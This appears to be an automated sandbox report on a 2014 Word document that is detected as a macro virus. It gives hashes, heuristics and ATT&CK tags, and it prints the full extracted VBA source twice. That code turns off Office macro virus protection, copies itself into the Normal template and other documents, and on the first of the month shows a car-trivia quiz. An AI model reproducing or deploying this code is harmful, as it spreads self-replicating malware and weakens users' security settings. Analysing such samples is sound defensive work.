Office (OLE) malware analysis — malicious · 2762bea545c7b4ae

MALICIOUS

Office (OLE)

37.0 KB Created: 2014-09-22 02:38:00 Authoring application: Microsoft Office Word First seen: 2014-10-17

MD5: e3103e8a1010f378416def0171cdbfcf SHA-1: 49b67eeb3cc882e67829545bccfbd9961e71641b SHA-256: 2762bea545c7b4ae59d77eb357df45fd88eba9729f30d922876f6fe9ec2fbbde

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that are designed to disable macro security settings and replicate their code into the Normal template. This behavior is indicative of malware attempting to establish persistence or prepare for further execution. The 'Document_Close' subroutine specifically targets the Normal template for code injection and saves it, which is a common persistence technique.

Heuristics 4

ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bptk-2
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3307 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3307 bytes
SHA-256: `6f2d80473bb19b94d68bab85120d8406847b6a042e7776c43e3523d5b7877108`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String Private Sub Document_Close() On Error Resume Next Set d = ActiveDocument.VBProject.VBComponents.Item(1) Set t = NormalTemplate.VBProject.VBComponents.Item(1) DI = d.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) TI = t.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) Options.VirusProtection = False If DI And Not (TI) Then Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines) t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines t.CodeModule.AddFromString Src NormalTemplate.Save ElseIf TI And Not (DI) Then If Day(Now()) = 1 Then Do r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _ & "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _ & "要好好思考哟!", "紧急提问")) Loop Until r <> "" If r = "B" Then MsgBox "好棒哟!" GoTo 10 Else MsgBox "唉!再给你一次机会." Do r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _ & "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _ & "想好了再回答!", "紧急提问")) Loop Until r <> "" If r = "C" Then MsgBox "谢谢你的支持!" GoTo 10 Else MsgBox "笨蛋!给你最后一次机会." Do r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _ & "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _ & "这是最后一次机会哟!", "紧急提问")) Loop Until r <> "" If r = "C" Then MsgBox "总算答对了!" GoTo 10 Else MsgBox "看来你还需要对长安之星多加了解..." ActiveDocument.SaveAs "c:\lzc.vxd" ActiveDocument.Close Exit Sub End If End If End If End If 10: Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines) d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines d.CodeModule.AddFromString Src ActiveDocument.Save End If End Sub Private Sub Document_Open() On Error Resume Next Set d = ActiveDocument.VBProject.VBComponents.Item(1) Set t = NormalTemplate.VBProject.VBComponents.Item(1) DI = d.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) TI = t.CodeModule.Find("长安公司汽研所常识课", 1, 1, 10000, 10000) Options.VirusProtection = False If DI And Not (TI) Then t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines ElseIf TI And Not (DI) Then d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines End If End Sub

SHA-256: 6f2d80473bb19b94d68bab85120d8406847b6a042e7776c43e3523d5b7877108

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String


Private Sub Document_Close()
On Error Resume Next

Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)

Options.VirusProtection = False

  If DI And Not (TI) Then
    Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
    t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
    t.CodeModule.AddFromString Src
    NormalTemplate.Save
    
  ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
 Do
 r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
 & "A.3米4  B.3米5  C.3米55  D.3米7" & Chr(13) & Chr(13) _
 & "要好好思考哟!", "紧急提问"))
 Loop Until r <> ""
 If r = "B" Then
   MsgBox "好棒哟!"
   GoTo 10
 Else
   MsgBox "唉!再给你一次机会."
    Do
     r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
     & "A.标准型  B.普通型  C.豪华型" & Chr(13) & Chr(13) _
     & "想好了再回答!", "紧急提问"))
    Loop Until r <> ""
      If r = "C" Then
        MsgBox "谢谢你的支持!"
        GoTo 10
      Else
        MsgBox "笨蛋!给你最后一次机会."
          Do
           r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
           & "A.防止撞车  B.防止侧滑  C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
           & "这是最后一次机会哟!", "紧急提问"))
          Loop Until r <> ""
           If r = "C" Then
             MsgBox "总算答对了!"
             GoTo 10
           Else
             MsgBox "看来你还需要对长安之星多加了解..."
             ActiveDocument.SaveAs "c:\lzc.vxd"
             ActiveDocument.Close
             Exit Sub
           End If
      End If
 End If
End If
10:
    Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
    d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
    d.CodeModule.AddFromString Src
    ActiveDocument.Save
      
  End If


End Sub

Private Sub Document_Open()
On Error Resume Next

Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)

Options.VirusProtection = False

  If DI And Not (TI) Then
    t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
    
  ElseIf TI And Not (DI) Then
    d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
      
  End If
  
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.